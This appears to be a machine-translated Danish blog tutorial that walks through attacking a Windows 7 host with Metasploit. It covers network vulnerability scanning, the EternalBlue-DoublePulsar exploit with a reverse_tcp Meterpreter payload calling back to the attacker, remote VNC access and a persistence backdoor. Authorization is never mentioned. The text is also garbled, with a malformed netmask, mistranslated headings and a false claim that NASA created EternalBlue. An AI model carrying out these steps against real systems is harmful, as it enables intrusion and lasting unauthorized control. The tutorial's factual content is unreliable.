Som vi har diskuteret TOP 25 BEDSTE KALI LINUX TOOL, og vi satte METASPLOIT øverst på listen, så lad os nu diskutere og lære om METASPLOIT. Vi vil anbefale dig at være bekendt med Metasploit.

Metasploit blev oprindeligt skabt af H. D Moore i 2003, indtil det blev opkøbt og videreudviklet af Rapid7 den 21. oktober 2009. Metasploit-framework er fuldstændig skrevet ved hjælp af Ruby, og er en standardpakke installeret i Kali Linux-systemet (og også næsten alle Penetration Testing OS, tror jeg). Det er et af hackernes eller penetrationstesternes foretrukne kit til at undersøge sikkerhedssårbarheder, udvikle og udføre exploits på mål og anden sikkerhedsudvikling.

Metasploit kommer med flere udgaver, som generelt er opdelt i to kategorier, gratis version og betalingsversion. De gratis versioner: Metasploit Framework Community Edition (CLI-baseret grænseflade) og Armitage (GUI-baseret grænseflade). De betalte versioner : Metasploit Express, Metasploit Pro og Cobalt Strike (det ligner Armitage, som leveres af Strategic Cyber LLC).

Metasploit giver brugerne mulighed for at oprette (eller udvikle) deres egen exploit-kode, men bare rolig, hvis du ikke ved, hvordan man koder, Metasploit har så mange moduler, og de bliver løbende opdateret. I øjeblikket har Metasploit over 1600 exploits og 500 payloads. Den enkle måde at forstå, hvad exploits og payloads er, er, at en exploits grundlæggende er den måde, hvorpå angriberen leverer payload gennem sårbarhedshullet i målsystemet. Når angriberen lancerer udnyttelsen, som indeholder en nyttelast mod et sårbart mål, så udrulles nyttelasten (nyttelasten bruges til at oprette forbindelse tilbage til angriberen for at få fjernadgang til målsystemet), på dette tidspunkt er udnyttelsen færdig og bliver irrelevant.

“Metasploit er ikke hacking instant tool, it is an insane framework”

Denne Metasploit-artikel handler om at udføre penetrationstest mod et målsystem ved hjælp af følgende flow:

  • Sårbarhedsscanning
  • Sårbarhedsvurdering
  • Sårbarhedsudnyttelse
  • Få fjernadgang – eje systemet

Forberedelse

Sørg for, at vores Kali Linux har den seneste opdaterede version. Der vil være forbedringer i hver opdatering. Kør følgende kommandoer:

~# apt update
~# apt upgrade -y
~# apt dist-upgrade -y

Når vores maskine er opdateret, kan vi nu begynde med at fyre op for metasploit-konsollen. I terminalen skal du skrive:

~# msfconsole

Og du skal også bruge en hvilken som helst teksteditor, Gedit eller Leafpad, for at indsamle nogle oplysninger undervejs, før vi kompilerer angrebet. Først skal du identificere din IP-adresse på den trådløse grænseflade, routerens IP-adresse og netmasken.

Baseret på ovenstående oplysninger noterer vi WLAN1 og routerens IP-adresse og netmasken. Notatet skal altså se således ud:

Attacker IP (LHOST): 192.168.1.56
Gateway / Routerens IP: 192.168.1.1
Netmask: 255.255.255.255.0(/24)

STED 1 : VULNERABILITY SCANNING

I metasploit-konsollen indsamler vi så først oplysninger, såsom målets IP-adresse, operativsystem, åbnede porte og sårbarheden. Metasploit giver os mulighed for at køre NMap direkte fra konsollen. Baseret på ovenstående oplysninger kører denne kommando for at udføre vores informationsindsamlingsopgave.

msf > nmap -v 192.168.1.1/24 --script vuln -Pn -O

Fra ovenstående kommando fik vi nedenstående resultat.

Vi fik et sårbart mål, der kører Windows Operating System, og det sårbare er på SMBv1 service. Så, tilføj til note.

Mål-IP (RHOST): 192.168.1.57
Sårbarhed: Remote Code Execution-sårbarhed i Microsoft SMBv1-servere (ms17-010)

STEG 2 : VULNERABILITY ASSESSMENT

Nu kender vi målet og dets sårbarhed. Lad os kontrollere sårbarheden i metasploit-konsollen

Nu kender vi målet og dets sårbarhed. Lad os kontrollere sårbarheden i metasploit-konsollen ved hjælp af smb_scanner-hjælpsmodulet. Kør følgende kommando:

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set RHOSTS
msf auxiliary(smb_ms17_010) > run

Metasploit er sikker på sårbarheden, og den viser den nøjagtige Windows OS Edition. Tilføj til note:

Target OS: Windows 7 Ultimate 7600

STEP 3 : EXPLOITING

Uheldigvis har metasploit ikke noget exploit-modul, der er relateret til denne sårbarhed. Men, bare rolig, der er en fyr udenfor udsat og skrev exploit-koden. Exploit er velkendt, da det er initieret af NASA det kaldes EternalBlue-DoublePulsar. Du kan hente den herfra, eller du kan følge guiden fra tutorial videoen nedenfor for at installere exploit koden til din metasploit framework.

Når du har fulgt med i guiden ovenfor, (sørg for at stien er den samme som i tutorialen). Nu er du klar til at udnytte målet. Kør følgende kommandoer:

use exploit/windows/smb/eternalblue_doublepulsar
set payload windows/meterpreter/reverse_tcp
set PROCESSINJECT spoolsv.exe
set RHOST 192.168.1.57
set LHOST 192.168.1.56

Exploit

Boom… Exploiten lykkedes, vi fik en meterpreter-session. Som jeg nævnte tidligere, når udnyttelsen lanceres, vil den implementere nyttelasten, som er, her brugte vi, windows/meterpreter/reverse_tcp.

STOP 4 : GAINING REMOTE ACCESS

Lader os udforske de mere tilgængelige kommandoer, indtast ‘?’ (uden spørgsmålstegn) og se listede tilgængelige kommandoer. Stdapi, systemkommandoerne er:

For at se flere oplysninger om målsystemet skal du bruge kommandoen ‘sysinfo’. Output bør se således ud:

Da vi injicerer til systemprocessen tidligere (spoolsv.exe), har vi fået System Privilege. Vi ejer målet. Vi kan gøre meget med kommandoen til målet. Vi kan f.eks. køre RDP, eller bare indstille VNC remote. For at køre VNC-tjenesten skal du indtaste kommandoen:

~# run vnc

Resultatet skal være målmaskinens skrivebord, det ser sådan ud.

Den vigtigste del er at skabe en bagdør, så når målet afbryder forbindelsen til vores maskine, vil målmaskinen forsøge at forbinde tilbage, igen til os. Backdooring bruges til at opretholde adgang, det er som at fiske, du vil ikke smide din fisk tilbage i vandet, når du har fået fisken, ikke sandt? Du ønsker at gøre noget med fisken, om du vil gemme den i køleskabet til yderligere handlinger, f.eks. tilberedning eller sælge den for penge.

Meterpreter har denne vedvarende backdooring-funktion. Kør følgende kommando, og tag et kig på de tilgængelige parametre og argumenter:

meterpreter > run persistence -h

Hvis du ikke er tryg ved dette forældede script, findes det nyeste persistence-modul under post/windows/manage/persistence_exe. Du kan selv udforske det yderligere.

Metasploit er enormt, det er ikke bare et værktøj, det er en ramme, tænk på, at det har over 1600 exploits og omkring 500 payloads. En artikel er kun egnet til det store billede af den generelle brug eller idé. Men du har lært så meget af denne artikel.

“Jo mere du følger angrebsflowet, jo mere har du ubesværet udfordring.”

Skriv et svar

Din e-mailadresse vil ikke blive publiceret.